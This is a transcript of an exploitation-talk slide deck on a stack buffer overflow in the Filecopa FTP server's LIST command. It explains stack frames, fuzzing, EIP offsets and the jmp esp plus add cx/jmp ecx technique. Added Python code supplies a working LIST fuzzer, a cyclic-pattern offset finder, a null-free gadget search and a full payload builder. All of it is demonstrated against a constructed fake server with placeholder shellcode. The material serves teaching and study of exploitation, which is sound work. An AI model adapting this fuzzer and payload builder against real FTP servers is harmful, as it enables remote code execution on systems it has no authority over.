Software Exploitation Techniques by Amit Malik
Transcript of the slides (uploaded by nu-the-open-security-community).
Slide 2
Application overview
Debuggers
Stack based buffer overflow
Demo
Slide 3
Filecopa FTP (File Transfer Protocol) server
Listens on port 21
Vulnerable to a buffer overflow
Slide 4
All-time favorite: OllyDbg
Why debuggers? Breakpoints: stop the target at a chosen instruction and inspect registers, memory and the stack.
Immunity Debugger
Others
Slide 6
Discovered in 1972: Computer Security Technology Planning Study.
Exploited in 1988: Morris Worm.
Published in Phrack in 1996: Aleph One, "Smashing the Stack for Fun and Profit."
Slide 7
Each function call creates its own stack frame. The caller's frame is known as the parent stack, the called function's frame as the child stack. For example:

  main(){
      sum();
  }

  ASM pseudo:
  _main:
  123: push ebp        ; save the caller's frame pointer
  124: mov ebp,esp     ; start main's own frame
  125: sub esp,val     ; reserve val bytes for main's locals
  126: call _sum       ; pushes the return address (127) and enters sum
  127: mov esp,ebp     ; release the locals
  128: pop ebp         ; restore the caller's frame pointer
  129: ret             ; pop the return address into EIP
Slides 8-10
(The listing from slide 7, 123-129, repeated; the same frame diagram is shown three times as the frame is built up.)

  higher addresses
  +-------------------+
  | Ret startup()     |  return address into the startup code that called main
  +-------------------+
  | ebp               |  saved frame pointer, pushed by 123
  +-------------------+
  | Locals main()     |  reserved by sub esp,val (125)
  +-------------------+
  | Ret(127)          |  return address pushed by call _sum (126)
  +-------------------+
  | ebp               |  main's frame pointer, saved by sum's prologue
  +-------------------+
  | Locals sum()      |
  +-------------------+
  | Unallocated space |
  +-------------------+
  lower addresses       Stack growth: downward
Slide 11
If the input written into the local variables is larger than the space allocated to them... then...
(Same frame diagram as slides 8-10: the write starts in Locals sum() and runs upward, towards the higher addresses, into the saved ebp and Ret(127).)
Slide 12
It will overwrite Ret(127), the saved return address (saved EIP).

  Before (overflow with A's)            After (crafted input)
  +-------------------+                 +-------------------+
  | Ret startup()     |                 | Ret startup()     |
  +-------------------+                 +-------------------+
  | ebp               |                 | ebp               |
  +-------------------+                 +-------------------+
  | Locals main()     |                 | Locals main()     |
  +-------------------+                 +-------------------+
  | AAAAAAAA          |  Ret(127)       | jmp esp           |  address of a jmp esp instruction
  +-------------------+                 +-------------------+
  | AAAAAAAA          |  saved ebp      | AAAAAAAA          |
  +-------------------+                 +-------------------+
  | AAAAAAAAAAAA...   |  Locals sum()   | AAAAAAAAAAAA...   |
  +-------------------+                 +-------------------+
  | Unallocated space |                 | Unallocated space |
  +-------------------+                 +-------------------+
                        Stack growth: downward

When sum returns, ret pops the overwritten slot: 0x41414141 in the first case (crash), the address of jmp esp in the second (execution continues at whatever ESP points to).
Slide 13
Vulnerable to a buffer overflow (LIST command).
But how do we know that the server is vulnerable?
Three methods to find security bugs:
1. Fuzzing
2. Reverse engineering
3. Source code auditing
Slide 14
Fuzzing: send invalid, unexpected, or random data to the inputs of a program. If the program fails or crashes, the defect can be noted.
OK, let's send invalid input to our server.
Still listening? Umm, no.. good.
But we don't know which function is causing this problem.
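As an added example (not code from the slides and not Filecopa's own code), here is the length-ramp fuzzing the slide describes for the LIST command, written in Python, together with a constructed fake FTP server so the whole thing runs offline. The fake server, its automatically chosen port, the anonymous login and its 1000-byte "buffer" are assumptions for the demo; the real target was Filecopa on port 21. The fuzzer does exactly what the slide does by hand: send a LIST with a longer and longer argument, then check whether the port is still listening.

```python
"""Length-ramp fuzzer for the FTP LIST command, plus a constructed fake server to
run it against offline. Added example, not the author's code."""
import socket
import threading


def recv_line(sock):
    """Read one CRLF-terminated FTP reply line; returns b"" if the peer closed."""
    data = b""
    while not data.endswith(b"\r\n"):
        chunk = sock.recv(1)
        if not chunk:
            break
        data += chunk
    return data


def send_list(host, port, length, user=b"anonymous", password=b"fuzz@", timeout=3.0):
    """Log in and send 'LIST ' + 'A' * length.  Returns the reply line, or None if
    the connection died before a reply came back (the usual crash symptom)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            recv_line(s)                                   # 220 banner
            s.sendall(b"USER " + user + b"\r\n")
            recv_line(s)                                   # 331
            s.sendall(b"PASS " + password + b"\r\n")
            recv_line(s)                                   # 230
            s.sendall(b"LIST " + b"A" * length + b"\r\n")
            return recv_line(s) or None
    except OSError:                                        # refused, reset or timed out
        return None


def still_listening(host, port, timeout=1.0):
    """The slide's 'still listening?' check: can we still open the port?"""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def fuzz_list(host, port, start=100, step=100, stop=5000):
    """Ramp the LIST argument length until the server stops listening.
    Returns the first length after which the port is dead, or None."""
    for length in range(start, stop + 1, step):
        send_list(host, port, length)
        if not still_listening(host, port):
            return length
    return None


class FakeFtpServer:
    """Constructed stand-in for the demo target (not a real FTP server): answers
    USER/PASS/LIST and 'crashes' (stops listening and drops the client without a
    reply) when the LIST argument exceeds buffer_size bytes."""

    def __init__(self, buffer_size=1000):
        self.buffer_size = buffer_size
        self.crashed = False
        self.sock = socket.socket()
        self.sock.bind(("127.0.0.1", 0))                  # port 0: let the OS pick one
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        while not self.crashed:
            try:
                conn, _ = self.sock.accept()
            except OSError:
                return
            with conn:
                try:
                    self._handle(conn)
                except OSError:
                    pass                                   # client went away early

    def _handle(self, conn):
        conn.sendall(b"220 fake ftp ready\r\n")
        while True:
            line = recv_line(conn)
            if not line:
                return
            cmd, _, arg = line.rstrip(b"\r\n").partition(b" ")
            cmd = cmd.upper()
            if cmd == b"USER":
                conn.sendall(b"331 password please\r\n")
            elif cmd == b"PASS":
                conn.sendall(b"230 logged in\r\n")
            elif cmd == b"LIST":
                if len(arg) > self.buffer_size:            # the 'overflow': die silently
                    self.crashed = True
                    self.sock.close()
                    return
                conn.sendall(b"226 listing done\r\n")
            else:
                conn.sendall(b"500 unknown command\r\n")


if __name__ == "__main__":
    target = FakeFtpServer(buffer_size=1000)
    print("server stopped listening after LIST length:", fuzz_list("127.0.0.1", target.port))
```

Against a real target the step size matters: a coarse ramp tells you the crash happens somewhere between two lengths, and the exact offset to EIP is found afterwards in the debugger, which is what the next slides do.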
Slide 15
Reverse engineering is the process of analyzing a subject system to create representations of the system at a higher level of abstraction.
Generally used after fuzzing.
Provides in-depth information about the target, sometimes more than the source code does.
Slide 17
Calculate the offset for EIP.
ESP is pointing to our buffer.
Aahhh.. problem: we don't have much space on the stack (only 13-14 bytes approx.).
Now what?? Check the other registers.
ECX is pointing at our data too, but not directly at its start.
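"Calculate the offset for EIP" is usually done with a cyclic pattern rather than by counting A's. As an added example (not code from the slides), here is that technique in Python: a non-repeating pattern is sent instead of the A's, and the EIP value shown in the debugger at the crash is mapped back to its offset in the buffer. This is the same idea as Metasploit's pattern_create / pattern_offset; the `simulate_crash` helper is a constructed stand-in for the debugger, and the offset 234 it is called with is only the slide's approximate figure.

```python
"""Cyclic pattern for finding the EIP offset. Added example, not the author's code."""
import string
import struct


def cyclic_pattern(length):
    """'Aa0Aa1...Aa9Ab0...' cut to length; every 4-byte window is unique within 20280 bytes."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern exhausted after %d bytes" % len(out))


def pattern_offset(eip, length=20280):
    """eip: the crash EIP as an int (as the debugger shows it, e.g. 0x41366941) or as
    4 raw bytes. Returns the byte offset of that dword in the pattern, or None."""
    needle = struct.pack("<I", eip) if isinstance(eip, int) else bytes(eip)
    if len(needle) != 4:
        raise ValueError("need a 4-byte value")
    index = cyclic_pattern(length).find(needle)
    return index if index >= 0 else None


def list_request(pattern):
    """The LIST line to send, with the pattern in place of the A's."""
    return b"LIST " + pattern + b"\r\n"


def simulate_crash(pattern, eip_offset):
    """Constructed stand-in for the debugger: the overflow copied `pattern` over the
    stack, so the saved EIP is the little-endian dword at eip_offset."""
    return struct.unpack("<I", pattern[eip_offset:eip_offset + 4])[0]


if __name__ == "__main__":
    pat = cyclic_pattern(300)
    eip = simulate_crash(pat, 234)          # pretend the debugger shows this EIP
    print("EIP=%08x -> offset %d" % (eip, pattern_offset(eip)))
```

Read the EIP from the debugger as a number (little-endian is handled by the pack), not as the four characters you see in the stack window in reverse order; the same lookup also works on the value ESP or ECX points at, which is how the distance between registers and the data on the next slides can be measured instead of guessed.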
Slide 18
But we do have some bytes on the stack. Use these bytes to adjust ECX and then jump to ECX.
We need a jmp esp (its address) first.
Note: hard-coding a stack address is not good practice: it contains null bytes, and the address may change.
Search for the address in DLLs, because DLL addresses are static, at least for the same service pack.
Slide 19
ECX is at 00652984 but our data starts at 006529cc (on my system).
Increase ECX; but there is a little problem: part of that data is what overwrote EIP.
So increasing ECX only as far as the start of the data gives little space (only 234 bytes approx. before the EIP overwrite).
So increase ECX further, so that it jumps over the saved EIP.
Slide 20
So add ecx,152. Does it work?? (OllyDbg's assembler takes immediates as hexadecimal, so 152 here is 0x152 = 338 bytes.)
Nope.. it generates null bytes, can't use: add ecx,152 assembles to 81 C1 52 01 00 00.
OK, add cx,152 then.. should work: the 16-bit form takes a 2-byte immediate and assembles to 66 81 C1 52 01, no null byte. Else increase the bytes until the encoding is null-free.
Caveat: add cx only changes the low 16 bits of ECX, so ECX + 152 must not carry out of the low word (here 2984 + 152 = 2AD6, so it does not).
Slide 21
Now jump to ECX (a jmp ecx instruction). And we have our shellcode ready.
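Putting slides 17-21 together, as an added example (not code from the slides): EIP is overwritten with the address of a jmp esp found in a module; at ESP sits a short stub, add cx,N followed by jmp ecx, that moves ECX past the bytes that overwrote EIP and into a NOP sled in front of the shellcode. The module image and its base address are constructed for the example (not a real DLL), the ECX and data addresses are the ones from slide 19, the 234-byte EIP offset and the 13 bytes of room at ESP are the slide's approximate figures, and the shellcode is an int3 placeholder. The add cx immediate is computed as the smallest null-free value that reaches the sled rather than taken from the slide, which found its 0x152 by hand.

```python
"""Payload layout for the jmp esp / add cx / jmp ecx technique. Added example."""
import struct

JMP_ESP = b"\xff\xe4"
JMP_ECX = b"\xff\xe1"

# Constructed module image, not a real DLL: 'jmp esp' planted twice, once at an
# offset whose address contains a null byte and once at a usable one.
FAKE_MODULE_BASE = 0x7C800000                             # assumed load address
FAKE_MODULE_IMAGE = (b"\x90" * 0x100 + JMP_ESP            # at 0x7C800100: has a 0x00 byte
                     + b"\x90" * (0x1234 - 0x102) + JMP_ESP   # at 0x7C801234: usable
                     + b"\xcc" * 16)


def contains_bad(data, bad=b"\x00"):
    return any(b in bad for b in data)


def find_gadget(image, base, gadget, bad=b"\x00"):
    """First address of `gadget` in `image` whose little-endian encoding has no bad byte."""
    start = 0
    while True:
        i = image.find(gadget, start)
        if i < 0:
            return None
        addr = base + i
        if not contains_bad(struct.pack("<I", addr), bad):
            return addr
        start = i + 1


def add_ecx_imm32(imm):
    return b"\x81\xc1" + struct.pack("<I", imm)            # add ecx, imm32 (81 /0 id)


def add_cx_imm16(imm):
    return b"\x66\x81\xc1" + struct.pack("<H", imm)        # add cx, imm16 (66 81 /0 iw)


def pick_add_cx(delta, bad=b"\x00"):
    """Smallest immediate >= delta whose 'add cx' encoding has no bad byte
    (the slide's 'else increase bytes'). Returns (imm, encoding)."""
    for imm in range(delta, 0x10000):
        enc = add_cx_imm16(imm)
        if not contains_bad(enc, bad):
            return imm, enc
    raise ValueError("no bad-byte-free 'add cx' immediate >= %d" % delta)


def build_payload(eip_offset, jmp_esp_addr, ecx, data_addr, shellcode, stub_room=13, bad=b"\x00"):
    """eip_offset: bytes from the start of the LIST argument to the saved EIP (slide: ~234).
    ecx / data_addr: where ECX points and where the argument starts at crash time
    (slide: 00652984 / 006529cc). stub_room: bytes usable at ESP (slide: 13-14)."""
    stub_start = eip_offset + 4                  # jmp esp lands right after the EIP slot
    sled_start = stub_start + stub_room          # first byte the stub may jump to
    delta = (data_addr - ecx) + sled_start       # ECX + delta == data_addr + sled_start
    imm, add_cx = pick_add_cx(delta, bad)
    if (ecx & 0xFFFF) + imm > 0xFFFF:            # add cx drops the carry out of the low word
        raise ValueError("add cx would wrap inside the low word; pick another register or stub")
    stub = add_cx + JMP_ECX
    if len(stub) > stub_room:
        raise ValueError("stub does not fit in the space at ESP")
    stub = stub.ljust(stub_room, b"\x90")
    landing = (ecx + imm) - data_addr            # offset ECX points at after the add
    payload = b"A" * eip_offset + struct.pack("<I", jmp_esp_addr) + stub
    payload += b"\x90" * (landing - len(payload)) + shellcode   # sled absorbs any rounding-up of imm
    if contains_bad(payload, bad):
        raise ValueError("payload contains a bad byte")
    return payload, imm


if __name__ == "__main__":
    jmp_esp = find_gadget(FAKE_MODULE_IMAGE, FAKE_MODULE_BASE, JMP_ESP)
    payload, imm = build_payload(234, jmp_esp, 0x00652984, 0x006529CC, b"\xcc" * 32)
    print("jmp esp @ %08x, add cx,%x, payload %d bytes" % (jmp_esp, imm, len(payload)))
```

The bad-byte check runs over the whole payload because a single 0x00 anywhere (in the gadget address, the stub or the shellcode) truncates the copy and the overwrite never reaches EIP; the 64K-carry check is the price of using add cx instead of add ecx.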